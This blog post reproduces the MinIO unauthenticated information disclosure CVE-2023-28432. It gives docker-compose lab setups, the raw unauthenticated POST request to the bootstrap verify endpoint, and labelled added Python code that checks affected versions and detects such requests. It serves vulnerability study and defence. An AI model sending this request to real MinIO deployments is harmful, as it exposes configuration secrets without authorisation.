MinIO Unauthenticated Information Disclosure (CVE-2023-28432)

Author: print("") Category: Information Security Published: 2023-03-23 20:34

Affected versions:

MinIO RELEASE.2019-12-17T23-16-33Z <= version < MinIO RELEASE.2023-03-20T20-16-18Z

I. Older version
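MinIO release tags encode a UTC timestamp, so the affected range above can be checked mechanically. The following is an added example, not code from the original post or from the MinIO project: it parses release tags, compares them against the two boundaries quoted above, and walks a docker-compose file to report which `minio/minio` images fall inside the range. The sample compose text is constructed from the two tags used later in this post.

```python
"""Classify MinIO release tags against the affected range for CVE-2023-28432.

Added example (not part of the original post).  The range boundaries are the
ones stated in the post; everything else here is an assumption about how a
defender would script the check.
"""
import re
from datetime import datetime, timezone

# MinIO tags look like RELEASE.2021-01-16T02-19-44Z (UTC timestamp with
# dashes instead of colons), optionally prefixed by an image name.
TAG_RE = re.compile(r"RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z")

FIRST_AFFECTED = "RELEASE.2019-12-17T23-16-33Z"   # inclusive lower bound
FIXED_IN = "RELEASE.2023-03-20T20-16-18Z"         # exclusive upper bound


def parse_release(tag: str) -> datetime:
    """Extract the timestamp embedded in a MinIO release tag."""
    m = TAG_RE.search(tag)
    if not m:
        raise ValueError(f"not a MinIO release tag: {tag!r}")
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S").replace(
        tzinfo=timezone.utc
    )


def is_affected(tag: str) -> bool:
    """True when FIRST_AFFECTED <= tag < FIXED_IN."""
    ts = parse_release(tag)
    return parse_release(FIRST_AFFECTED) <= ts < parse_release(FIXED_IN)


# Matches "image: <ref>" lines in a docker-compose file.  A real deployment
# would rather use a YAML parser; a regex keeps this example dependency-free.
IMAGE_RE = re.compile(r"^\s*image:\s*(\S+)", re.MULTILINE)


def affected_images(compose_text: str) -> dict:
    """Map every minio/minio image reference in a compose file to True/False.

    Images that are not MinIO, or whose tag is not a RELEASE.* tag (for
    example ':latest'), are skipped because their version cannot be decided
    from the text alone.
    """
    verdicts = {}
    for ref in IMAGE_RE.findall(compose_text):
        if "minio/minio" in ref and TAG_RE.search(ref):
            verdicts[ref] = is_affected(ref)
    return verdicts


# Constructed sample: the two image tags used in this post plus one
# non-MinIO image that should be ignored.
SAMPLE_COMPOSE = """
services:
  minio1:
    image: minio/minio:RELEASE.2021-01-16T02-19-44Z
  minio2:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
  proxy:
    image: nginx:latest
"""

if __name__ == "__main__":
    for ref, bad in affected_images(SAMPLE_COMPOSE).items():
        print(f"{'AFFECTED ' if bad else 'ok       '}{ref}")
```

Note that both tags used in this post, the 2021 build as well as the 2023-01-31 build, sit inside the stated range; the post's observation that the older build returned nothing is an observation about that particular single-node setup, not a reason to treat the older tag as out of range.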

docker-compose.yml

version: '3.7'
services:
  minio1:
    image: minio/minio:RELEASE.2021-01-16T02-19-44Z
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9000:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:


Start it up

[root@localhost momo]# 
[root@localhost momo]# docker-compose -f docker-compose2.yml up
Building with native build. Learn about native build in Compose here: https://docs.docker.com/go/compose-native-build/
Pulling minio1 (minio/minio:RELEASE.2021-01-16T02-19-44Z)...
RELEASE.2021-01-16T02-19-44Z: Pulling from minio/minio
a6b97b4963f5: Pull complete
13948a011eec: Pull complete
b27f7b93c977: Pull complete
527a35f50a95: Pull complete
bae74d83b250: Pull complete
0f5c2801c42c: Pull complete
23c30f3146bf: Pull complete
Digest: sha256:a176d2194523a587f4103bce5e8d408e7aadc737e7e67067ca9c195a2b69fbe4
Status: Downloaded newer image for minio/minio:RELEASE.2021-01-16T02-19-44Z
Recreating momo_minio1_1 ... done


After starting, wait about a minute before the service becomes reachable.

Open it:

Test it:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

On the older version, the response contains no information at all.

II. Newer version

version: '3.7'

# starts 4 docker containers running minio server instances. Each
# minio server's web interface will be accessible on the host at port
# 9001 through 9004.
services:
  minio1:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio1
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9001:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio2:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio2
    volumes:
      - data2-1:/data1
      - data2-2:/data2
    ports:
      - "9002:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio3:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio3
    volumes:
      - data3-1:/data1
      - data3-2:/data2
    ports:
      - "9003:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio4:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio4
    volumes:
      - data4-1:/data1
      - data4-2:/data2
    ports:
      - "9004:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:
  data2-1:
  data2-2:
  data3-1:
  data3-2:
  data4-1:
  data4-2:

Start it up and send the same request:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
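The request head shown above carries no Authorization header, and on the affected builds the bootstrap endpoint answers anyway. A reverse proxy or WAF in front of MinIO can flag exactly that shape of request. The following is an added example, not code from the original post or from MinIO: it parses a raw HTTP request head like the one captured above and classifies any request to `/minio/bootstrap/v1/verify` that lacks an Authorization header as an alert. The sample requests are constructed from the head shown in this post; the verdict strings and the assumption that the proxy sees the full request head are mine.

```python
"""Flag unauthenticated requests to the MinIO bootstrap verify endpoint.

Added example (not part of the original post).  Input is the raw request
head as a proxy or packet capture would present it.
"""
BOOTSTRAP_PATH = "/minio/bootstrap/v1/verify"

ALERT = "alert"     # bootstrap verify without Authorization
ALLOW = "allow"     # bootstrap verify with Authorization present
IGNORE = "ignore"   # some other path; not this check's concern


def parse_request_head(raw: str):
    """Split a raw HTTP/1.x request head into (method, target, headers).

    Header names are lower-cased so lookups are case-insensitive, as HTTP
    requires.  Parsing stops at the first blank line (end of head).
    """
    lines = raw.lstrip("\r\n").splitlines()
    if not lines:
        raise ValueError("empty request")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw: str) -> str:
    """Return ALERT / ALLOW / IGNORE for one captured request head."""
    _method, target, headers = parse_request_head(raw)
    path = target.split("?", 1)[0]          # drop any query string
    if path.rstrip("/") != BOOTSTRAP_PATH:
        return IGNORE
    if "authorization" in headers:
        return ALLOW
    return ALERT


def audit(captures) -> list:
    """Classify a batch of request heads; returns (host, verdict) pairs."""
    out = []
    for raw in captures:
        _m, _t, headers = parse_request_head(raw)
        out.append((headers.get("host", "?"), classify(raw)))
    return out


# Constructed samples based on the request head captured in this post.
UNAUTH_VERIFY = """POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
User-Agent: Mozilla
Accept-Encoding: gzip, deflate
Connection: close

"""

# Same request with a (placeholder) Authorization header added.
AUTH_VERIFY = UNAUTH_VERIFY.replace(
    "Connection: close", "Connection: close\nAuthorization: AWS4-HMAC-SHA256 <placeholder>"
)

HEALTH_CHECK = """GET /minio/health/live HTTP/1.1
Host: 192.168.69.81:9000
Connection: close

"""

if __name__ == "__main__":
    for host, verdict in audit([UNAUTH_VERIFY, AUTH_VERIFY, HEALTH_CHECK]):
        print(f"{verdict:<7}{host}")
```

Alerting on the unauthenticated hit is the detection half; the mitigation that does not depend on detection is upgrading to RELEASE.2023-03-20T20-16-18Z or later, and until then not exposing the MinIO port to anything other than the cluster's own peers.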


